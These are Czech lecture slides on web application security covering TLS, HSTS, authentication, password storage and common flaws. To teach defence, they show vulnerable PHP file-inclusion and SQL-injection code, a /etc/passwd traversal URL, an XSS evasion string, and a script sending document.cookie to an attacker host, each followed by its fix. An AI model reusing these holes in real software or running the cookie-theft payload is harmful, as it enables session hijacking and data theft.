Bezpečnost webových aplikací

4IZ278 – Webové aplikace

Jirka Kosek

Poslední modifikace: 2020-04-02 23:10:43 UTC

Úvod

Co nás čeká

 • šifrování přenášených dat

 • autentizace a autorizace uživatelů a aplikací

 • bezpečnostní slabiny webových aplikací a způsoby ochrany

Šifrování přenášených dat

Proč šifrovat

 • některá data jsou skutečně citlivá

  • on-line bankovnictví

  • komunikace mezi obchodními partnery

  • vzdálený přístup do podnikového IS

 • kvůli ochraně soukromí a některým typům bezpečnostních útoků je dnes trend šifrovat veškerou komunikaci

 • šifrování zároveň znemožňuje modifikaci obsahu stránky během jejího přenosu

Jak se dnes šifruje

 • hybridní systémy – kombinace asymetrických a symetrických šifer

 • pro zabezpečení přenosu se používá SSL (Secure Sockets Layer) nebo novější TLS (Trasport Layer Security) – protokoly umožňující zašifrovat cokoliv na bázi protokolu TCP

 • prohlížeč si o zabezpečené připojení řekne pomocí speciálního URL ve tvaru

  https://...
 • server se s klientem dohodne na kvalitě šifrování (možnost snížení kvality šifrování počítačem mezi klientem a serverem)

 • protokol HTTP/2 používá v současných prohlížečích šifrování vždy

HTTPS od prvního požadavku

 • u webů vyžadujících zabezpečení nesmí být web přístupný přes HTTP (bez šifrování)

 • automatické přesměrování na šifrovanou verzi

 • novější prohlížeče podporují HSTS (HTTP Strict Transport Security)

  • server prohlížeči pomocí hlavičky HTTP sdělí, že je povolený přístup pouze přes HTTPS

  • veškeré odkazy vedoucí na http:// se automaticky změní na https://

  • při chybném certifikátu není web přístupný

  • prohlížeče mají zabudovanou databázi domén, pro které se má použít HSTS (odpadá nutnost prvního, potenciálně nebezpečného požadavku)

Certifikáty a CA

 • server posílá klientovi certifikát

 • certifikát – spojuje dohromady počítač s reálně existující osobou (fyzickou či právnickou)

 • certifikát slouží pro ověření totožnosti serveru

 • certifikát může mít i klient, ale na webu se to zatím moc nepoužívá

 • certifikát vydává certifikační autorita (CA) – ta by měla ověřit skutečnou identitu žadatele o certifikát

 • prohlížeč automaticky věří certifikátům od CA, které zná (umí ověřit podpis na certifikátu)

 • ostatní certifikáty je potřeba ručně doinstalovat nebo doinstalovat CA, která je vystavila

Získání certifikátu

 • certifikáty prodávají certifikační autority

 • existuje i možnost získání certifikátu zdarma

Autentizace a autorizace uživatelů

Základní pojmy

autentizace

ověření totožnosti

autorizace

ověření práv pro vykonání určité činnosti

HTTP autentizace

 • standardní součást protokolu HTTP

 • nelze změnit podobu přihlašovacího okna

 • obtížně se řeší odhlášení a automatické odhlášení po určité době

 • bývá implementována na úrovni webového serveru

 • hesla jsou přenášena v nekódované podobě

  • lze použít i bezpečnější metodu Digest, kdy se posílají již jen hashe

Vlastní autentizace

 • využívá HTML formuláře a session proměnné

 • mnohem větší flexibilita oproti HTTP – vlastní přihlašovací stránka, hesla uložená na libovolném místě

 • v session proměnné se uchovávají informace o přihlášeném uživateli a o době jeho posledního přístupu

 • odhlášení – stačí zrušit session proměnnou

 • automatické odhlášení – při každém požadavku se porovnává aktuální čas s časem posledního přístupu (ten je uložen v session proměnné)

 • pokud klient podporuje JavaScript, lze použít challenge-response mechanismus (heslo není přenášeno v odkrytém tvaru)

Klientské certifikáty

 • využívá mechanismus SSL/TLS, ale certifikátem se neprokazuje jen server, ale i uživatel

 • uživatelsky méně přívětivé – uživatel musí mít na počítači k dispozici svůj certifikát

 • často je nutný speciální HW jako čtečka čipových karet

 • využívá se v aplikacích, které potřebují vzbudit zdání větší bezpečnosti, např. internetové bankovnictví

Web Authentication

 • nový standard pro autentizaci na webu

 • definuje API, pomocí kterého lze generovat páry privátní/veřejný klíč pro každou aplikaci

 • přihlašování pak probíhá automaticky podepsáním dat privátním klíčem bez nutnosti zadávat heslo

 • privátní klíče se ukládají na HW token nebo se vše integruje s funkcemi OS – např. FaceID, čtečka otisku prstu, …

 • popis toho, jak funguje WebAuthnWeb Authentication

Federalizované autentizační služby

 • decentralizovaný mechanismus pro jednotné přihlašování k aplikacím (SSO = single sign on)

 • uživatel používá jednotný identifikátor v mnoha aplikacích

 • autentizaci neprovádějí jednotlivé aplikace, ale poskytovatel identity

 • příklady služeb/protokolů: SAML, OpenID, OpenID Connect

OpenID

 • decentralizovaný mechanismus pro jednotné přihlašování k webovým aplikacím (SSO = single sign on)

 • uživatel používá jednotný OpenID identifikátor v mnoha aplikacích

 • autentizaci neprovádějí jednotlivé aplikace, ale poskytovatel identity

 • poskytovatel identity může aplikaci se souhlasem uživatele předat vybrané osobní údaje (např. email, adresa, …) – pohodlné pro uživatele

OAuth 2.0

 • mechanismus pro autorizaci aplikací, které mohou využívat prostředky na serveru (API) jménem uživatele

 • používá například Facebook, Twitter, Google, GitHub, …

OpenID Connect

Ukládání hesel

 • aplikace by v žádném případě neměla ukládat hesla v odkryté podobě

 • ukládání otisku (hashe) hesla nestačí, kvůli předgenerovaným slovníkům otisků

 • doporučené je ukládat otisk hesla a „soli“

 • pro výpočet otisku je lepší používat pomalé hasovací funkce pro ztížení útoku hrubou silou

 • na straně uživatele je vhodné využívat správce hesel, který zajistí silná a různá hesla

Nejčastější bezpečnostní slabiny aplikací

Nekontrolování vstupu od uživatele

 • veškerá data získaná od uživatele by měla být před použitím ověřena

 • musíme počítat s tím, že uživatel omylem udělá chybu nebo se někdo záměrně snaží nabourat do aplikace

 • data je potřeba vždy validovat na straně serveru, protože kód běžící na klientovi může uživatel/útočník měnit (např. AJAXové aplikace)

 • data pocházející od uživatele (může je měnit)

  • obsah formulářových polí

  • URL adresa požadavku

  • cookies

  • HTTP hlavičky

  • požadavky AJAX

Příklad 1. Získání libovolného souboru ze serveru

Předpokládejme, že máme skript, který generuje webové stránky. Obsah stránky získá ze zvoleného souboru a k němu doplní standardní hlavičku a patičku. Jednotlivé stránky se tak volají pomocí adresy http://example.org/index.php?page=uvodni.inc.

... standardní hlavička v HTML ...
<?php
 include $_GET["page"];
?>
... standardní patička ...

Co se stane, když zlý uživatel zadá URL ve tvaru http://example.org/index.php?page=/etc/passwd?

Příklad 2. Správné řešení s kontrolou dovolených vstupů
... standardní hlavička v HTML ...
<?php
 if (in_array($_GET["page"], array("uvod.inc", "cenik.inc", "kontakt.inc"))
 { 
  include $_GET["page"];
 }
 else
 {
  echo "Požadovaná stránka neexistuje. Pokračujte na 
     <a href='index.php?page=uvod.inc'>úvodní stránce</a>.";
 }
?>
... standardní patička ...

Způsob kontroly

 • whitelisting

  • explicitně vyjmenujeme co je dovoleno

  • výrazně snižuje možnost útoku

  • nelze použít vždy

 • blacklisting

  • kontrolujeme, co není dovoleno

  • vždy existuje možnost, že na něco zapomeneme

  • kontrolní kód je potřeba neustále udržovat s tím, jak se objevují nové typy útoků

Reakce na nepovolený vstup

 • musíme logovat pro další případnou analýzu, pokud by útok byl úspěný

 • uživateli vrátíme obecnou stránku oznamující chybu

 • chybová stránka by neměla obsahovat příliš detailů

 • do chybové stránky nevypisujeme data z požadavku – další potencionální díra

SQL injection

 • skripty často konstruují SQL dotaz dynamicky na základě vstupů

 • vstupy se musí pečlivě kontrolovat, aby chybný vstup neumožnil spuštění libovolného SQL příkazu

  • „whitelisting“ povolených znaků

  • prepared statements (prepare šablona + dosazení parametrů při execute)

  • escapovací funkce (mysql_real_escape_string(), PDO::quote())

Příklad 3. Chybný skript umožňující SQL injection

Formulář obsahuje vstupní pole jmeno pro zadání hledaného jména

<?php
...
$jmeno = $_GET["jmeno"];
$spojeni = ODBC_Connect("test", "user", "password");
$vysledek = ODBC_Exec($spojeni, 
      "SELECT * FROM Zamestnanci
       WHERE Jmeno LIKE '$jmeno%' 
       ORDER BY Jmeno");
...
?>
Příklad 4. Správné řešení s kontrolou vstupu

Před předáním dat dotazu se testuje, zda řetězec obsahuje jen povolené znaky

<?php
...
$jmeno = $_GET["jmeno"];
if (!ERegI("^[a-z]+$" , $jmeno))
{
 echo "Hledaný text může obsahovat jen písmena.";
 exit;
}
$spojeni = ODBC_Connect("test", "user", "password");
$vysledek = ODBC_Exec($spojeni, 
      "SELECT * FROM Zamestnanci
       WHERE Jmeno LIKE '$jmeno%' 
       ORDER BY Jmeno");
...
?>
Příklad 5. Správné řešení s prepared statements

Samo databázové API se postará o to, aby předaný parametr nemohl změnit syntaxi příkazu SQL

<?php
...
$jmeno = $_GET["jmeno"] . '%';
$dbh = new PDO('mysql:host=localhost;dbname=test', $user, $pass);
$stmt = $dbh->prepare("SELECT * FROM Zamestnanci
       WHERE Jmeno LIKE :jmeno
       ORDER BY Jmeno");
$stmt->bindParam(':jmeno', $jmeno);
$stmt->execute();
...
?>

XSS

Cross-Site Scripting

 • veškerý uživatelsky generovaný vstup musí být před vložením do stránky správně escapován (diskusní fóra, zobrazení údajů z formuláře, …)

 • v opačném případě může útočník do stránky vložit Javascript, který se spustí všem a může odesílat citlivé údaje jako session id

 • escapovací funkce v PHP: strip_tags(), htmlspecialchars()

 • nepoužívat chytrá řešení, často si neporadí se záludnými situacemi

  <src<script>ipt>…

Ochrana session

 • jediná 100% spolehlivá ochrana je SSL a vypnuté posílání HTTP hlavičky Referer

 • útok spočívá ve špatné kontrole vstupu a v cross-site skriptování

Příklad 6. Získání session-id přenášeného v URL
 1. na serveru, kde je uživatel přihlášen, je diskusní fórum

 2. útočník do diskusního fóra přidá příspěvek s odkazem vedoucím na jeho server (odkaz musí být zajímavý, aby zaujal)

 3. skript na útočníkově serveru z HTTP hlavičky Referer získá kompletní URL předchozí stránky včetně session-id

 4. pomocí získaného session-id se útočník může přihlásit na server pod jménem uživatele a číst jeho data, změnit heslo, …

 5. snížení rizika:

  • všechny odkazy ve vložených příspěvcích přesměrovávat přes pomocnou stránku, která již v URL nemá session-id

  • blokovat odesílání hlavičky Referer pomocí Referrer-Policy: no-referrer (zatím nepodporují všechny prohlížeče)

  • dodatečná kontrola session-id (kontrola shody IP adresy, session-id se mění pro každou stránku)

Příklad 7. Ochrana session-id přenášeného v cookie
 1. na serveru, kde je uživatel přihlášen je diskusní fórum

 2. útočník do diskusního fóra přidá příspěvek s kusem JS kódu, který čte cookie

  <script>document.write('<img src="http://utocnik.cz/steal?'+document.cookie+'">')</script>
 3. útočníkův skript získá obsah cookie a může ji zneužít

 4. ochrana:

  • jako v předchozím případě

  • session-id přenášet pomocí „HttpOnly“ cookie (nejde číst pomocí JS)

  • důsledná kontrola vstupních dat, nedovolit zadání HTML a JS kódu do příspěvku

Content Security Policy

 • podstatou mnoha XSS útoků je načtení skriptu či jiných zdrojů z webu útočníka

 • pomocí HTTP hlavičky může aplikace zakázat prohlížeči některé operace, které jsou často zneužívány k XSS útokům

 • např. povolení pouze vlastních skriptů a skriptů načítaných z dané domény

  Content-Security-Policy: script-src 'self' https://apis.google.com
 • při použití CSP jsou automaticky blokovány inline skripty, atributy pro obsluhu událostí, element style, …

Same Origin Policy

 • pro zvýšení bezpečnosti prohlížeče v praxi uplatňují tzv. Same Origin Policy

 • např. AJAXový požadavek může skript odeslat jen na server se stejným „origin“

 • origin – protokol, doména, port

 • v případě potřeby lze omezení změnit pomocí hlaviček CORS

CSRF

Cross-Site Request Forgery

 • útočník vyvolá falešné HTTP požadavky a pokud je v tu chvíli uživatel přihlášen (např. přes session), operace se provede

 • stav měnící operace by neměly být dostupné pomocí metody GET

Další problémy

 • špatná konfigurace serveru a jeho operačního systému

 • špatná správa a ukládání hesel aplikace

 • nekontrolování přístupu k operacím a objektům zadaným přímo do URL po prvotní autentizaci a autorizaci

 • vystavení citlivých dat na „tajné URL adrese“

 • neaktualizovaní rozšířených komponent (redakční systémy, diskusní fóra, …)

Kdy a kde provádět kontrolu

 • nesmíme věřit nikomu, ani vlastní databázi (útok, zadání dat z jiné aplikace, …)

 • je proto potřeba ošetřovat veškeré vstupy

 • a escapovat veškeré výstupy

Pár slov závěrem

Pár slov závěrem

Nepodceňovat!!!!!!!!!!!

Zdroje informací

Povinná četba

Další zajímavé zdroje